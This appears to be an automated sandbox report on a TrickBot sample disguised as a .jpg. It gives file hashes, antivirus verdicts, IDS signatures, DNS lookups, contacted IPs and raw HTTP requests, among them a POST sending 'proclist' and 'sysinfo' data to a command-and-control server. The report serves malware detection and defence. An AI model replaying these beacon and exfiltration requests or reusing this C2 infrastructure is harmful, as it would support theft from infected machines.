1489Trickbot_30c35d8c6f6691cc967ef79d3847ee4c_jpg_2019-09-10_19_30.txt

1.  
2. * ID: 1489
3. * MalFamily: "TrickBot"
4.  
5. * MalScore: 10.0
6.  
7. * File Name: "Trickbot_30c35d8c6f6691cc967ef79d3847ee4c.jpg"
8. * File Size: 17408
9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
10. * SHA256: "9e7645f45c092e203c5795663a5b8ba0862987a5e4a2d04b024c935ed23e032c"
11. * MD5: "30c35d8c6f6691cc967ef79d3847ee4c"
12. * SHA1: "e7c94298f843cb89039b2dfd5531a46ed50cf5fc"
13. * SHA512: "90cea89684c733e5c5eb319994ae16349c8f820a3ab591e7985248f2dcebe4174ca075778d70afa9ef9134db599a33cc84878e63b3cafcc9059065c0093cc11a"
14. * CRC32: "33CBADAF"
15. * SSDEEP: "384:B3ZsZrjpFINb0vNZl53XZFk8990ZUjbd/axM8GTf8pKc/78+i8NxBMYXkat:B3ZsZrjpFINb0vNZl53XZFk8990ZUPdK"
16.  
17. * Process Execution:
18.  
19. * Executed Commands:
20.  
21. * Signatures Detected:
22.  
23. "Description": "Communicates with IPs located across a large number of unique countries",
24. "Details":
25.  
26. "country": "Bulgaria"
27.  
28.  
29. "country": "United States"
30.  
31.  
32. "country": "unknown"
33.  
34.  
35. "country": "Ukraine"
36.  
37.  
38. "country": "France"
39.  
40.  
41. "country": "Brazil"
42.  
43.  
44.  
45.  
46. "Description": "File has been identified by 6 Antiviruses on VirusTotal as malicious",
47. "Details":
48.  
49. "Cylance": "Unsafe"
50.  
51.  
52. "APEX": "Malicious"
53.  
54.  
55. "Endgame": "malicious (high confidence)"
56.  
57.  
58. "FireEye": "Generic.mg.30c35d8c6f6691cc"
59.  
60.  
61. "SentinelOne": "DFI - Malicious PE"
62.  
63.  
64. "CrowdStrike": "win/malicious_confidence_80% (D)"
65.  
66.  
67.  
68.  
69. "Description": "Multiple direct IP connections",
70. "Details":
71.  
72. "direct_ip_connections": "Made direct connections to 7 unique IP addresses"
73.  
74.  
75.  
76.  
77. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
78. "Details":
79.  
80. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
81.  
82.  
83. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
84.  
85.  
86. "suspicious_request_iocs": "http://69.16.254.181/JdNG9d"
87.  
88.  
89. "suspicious_request_iocs": "http://hrpm.ca/images/result.php"
90.  
91.  
92. "suspicious_request_iocs": "http://icanhazip.com/"
93.  
94.  
95. "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90"
96.  
97.  
98. "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/"
99.  
100.  
101.  
102.  
103. "Description": "Performs some HTTP requests",
104. "Details":
105.  
106. "url_iocs": "http://69.16.254.181/JdNG9d"
107.  
108.  
109. "url_iocs": "http://hrpm.ca/images/result.php"
110.  
111.  
112. "url_iocs": "http://icanhazip.com/"
113.  
114.  
115. "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90"
116.  
117.  
118. "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/"
119.  
120.  
121.  
122.  
123. "Description": "Looks up the external IP address",
124. "Details":
125.  
126. "domain": "icanhazip.com"
127.  
128.  
129.  
130.  
131. "Description": "Created network traffic indicative of malicious activity",
132. "Details":
133.  
134. "signature": "ET CNC Feodo Tracker Reported CnC Server group 21"
135.  
136.  
137. "signature": "ET CNC Feodo Tracker Reported CnC Server group 2"
138.  
139.  
140. "signature": "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)"
141.  
142.  
143. "signature": "ET CNC Feodo Tracker Reported CnC Server group 4"
144.  
145.  
146. "signature": "ET TROJAN PTsecurity Trickbot Data Exfiltration"
147.  
148.  
149.  
150.  
151.  
152. * Started Service:
153.  
154. * Mutexes:
155.  
156. * Modified Files:
157.  
158. * Deleted Files:
159.  
160. * Modified Registry Keys:
161.  
162. * Deleted Registry Keys:
163.  
164. * DNS Communications:
165.  
166. "type": "A",
167. "request": "hrpm.ca",
168. "answers":
169.  
170. "data": "162.208.2.182",
171. "type": "A"
172.  
173.  
174.  
175.  
176. "type": "A",
177. "request": "icanhazip.com",
178. "answers":
179.  
180. "data": "104.20.16.242",
181. "type": "A"
182.  
183.  
184. "data": "104.20.17.242",
185. "type": "A"
186.  
187.  
188.  
189.  
190. "type": "A",
191. "request": "238.175.207.91.zen.spamhaus.org",
192. "answers":
193.  
194. "data": "",
195. "type": "NXDOMAIN"
196.  
197.  
198.  
199.  
200. "type": "A",
201. "request": "238.175.207.91.cbl.abuseat.org",
202. "answers":
203.  
204. "data": "127.0.0.2",
205. "type": "A"
206.  
207.  
208.  
209.  
210.  
211. * Domains:
212.  
213. "ip": "127.0.0.4",
214. "domain": "238.175.207.91.zen.spamhaus.org"
215.  
216.  
217. "ip": "104.20.17.242",
218. "domain": "icanhazip.com"
219.  
220.  
221. "ip": "162.208.2.182",
222. "domain": "hrpm.ca"
223.  
224.  
225. "ip": "127.0.0.2",
226. "domain": "238.175.207.91.cbl.abuseat.org"
227.  
228.  
229.  
230. * Network Communication - ICMP:
231.  
232. * Network Communication - HTTP:
233.  
234. "count": 1,
235. "body": "",
236. "uri": "http://69.16.254.181/JdNG9d",
237. "user-agent": "OnkyoblasterOS X-f5.99",
238. "method": "GET",
239. "host": "69.16.254.181",
240. "version": "1.1",
241. "path": "/JdNG9d",
242. "data": "GET /JdNG9d HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: 69.16.254.181\r\nConnection: Keep-Alive\r\n\r\n",
243. "port": 80
244.  
245.  
246. "count": 1,
247. "body": "",
248. "uri": "http://hrpm.ca/images/result.php",
249. "user-agent": "OnkyoblasterOS X-f5.99",
250. "method": "GET",
251. "host": "hrpm.ca",
252. "version": "1.1",
253. "path": "/images/result.php",
254. "data": "GET /images/result.php HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: hrpm.ca\r\nConnection: Keep-Alive\r\n\r\n",
255. "port": 80
256.  
257.  
258. "count": 1,
259. "body": "",
260. "uri": "http://icanhazip.com/",
261. "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36",
262. "method": "GET",
263. "host": "icanhazip.com",
264. "version": "1.1",
265. "path": "/",
266. "data": "GET / HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36\r\nHost: icanhazip.com\r\n\r\n",
267. "port": 80
268.  
269.  
270. "count": 1,
271. "body": "--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
272. "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90",
273. "user-agent": "test",
274. "method": "POST",
275. "host": "170.238.117.187:8082",
276. "version": "1.1",
277. "path": "/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90",
278. "data": "POST /wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90 HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=Arasfjasu7\r\nUser-Agent: test\r\nHost: 170.238.117.187:8082\r\nContent-Length: 154\r\nCache-Control: no-cache\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
279. "port": 8082
280.  
281.  
282. "count": 1,
283. "body": "",
284. "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/",
285. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
286. "method": "POST",
287. "host": "170.238.117.187",
288. "version": "1.1",
289. "path": "/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/",
290. "data": "POST /wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/ HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 170.238.117.187\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------UUAPUKXHESSJPTKD\r\nContent-Length: 286\r\n\r\n",
291. "port": 8082
292.  
293.  
294.  
295. * Network Communication - SMTP:
296.  
297. * Network Communication - Hosts:
298.  
299. "country_name": "Bulgaria",
300. "ip": "79.124.49.206",
301. "inaddrarpa": "",
302. "hostname": ""
303.  
304.  
305. "country_name": "United States",
306. "ip": "69.16.254.181",
307. "inaddrarpa": "",
308. "hostname": ""
309.  
310.  
311. "country_name": "unknown",
312. "ip": "45.80.148.173",
313. "inaddrarpa": "",
314. "hostname": ""
315.  
316.  
317. "country_name": "Ukraine",
318. "ip": "195.123.242.175",
319. "inaddrarpa": "",
320. "hostname": ""
321.  
322.  
323. "country_name": "France",
324. "ip": "178.33.26.175",
325. "inaddrarpa": "",
326. "hostname": ""
327.  
328.  
329. "country_name": "Brazil",
330. "ip": "170.238.117.187",
331. "inaddrarpa": "",
332. "hostname": ""
333.  
334.  
335. "country_name": "United States",
336. "ip": "162.208.2.182",
337. "inaddrarpa": "",
338. "hostname": "hrpm.ca"
339.  
340.  
341. "country_name": "United States",
342. "ip": "107.173.160.19",
343. "inaddrarpa": "",
344. "hostname": ""
345.  
346.  
347. "country_name": "United States",
348. "ip": "104.20.16.242",
349. "inaddrarpa": "",
350. "hostname": "icanhazip.com"
351.  
352.  
353.  
354. * Network Communication - IRC: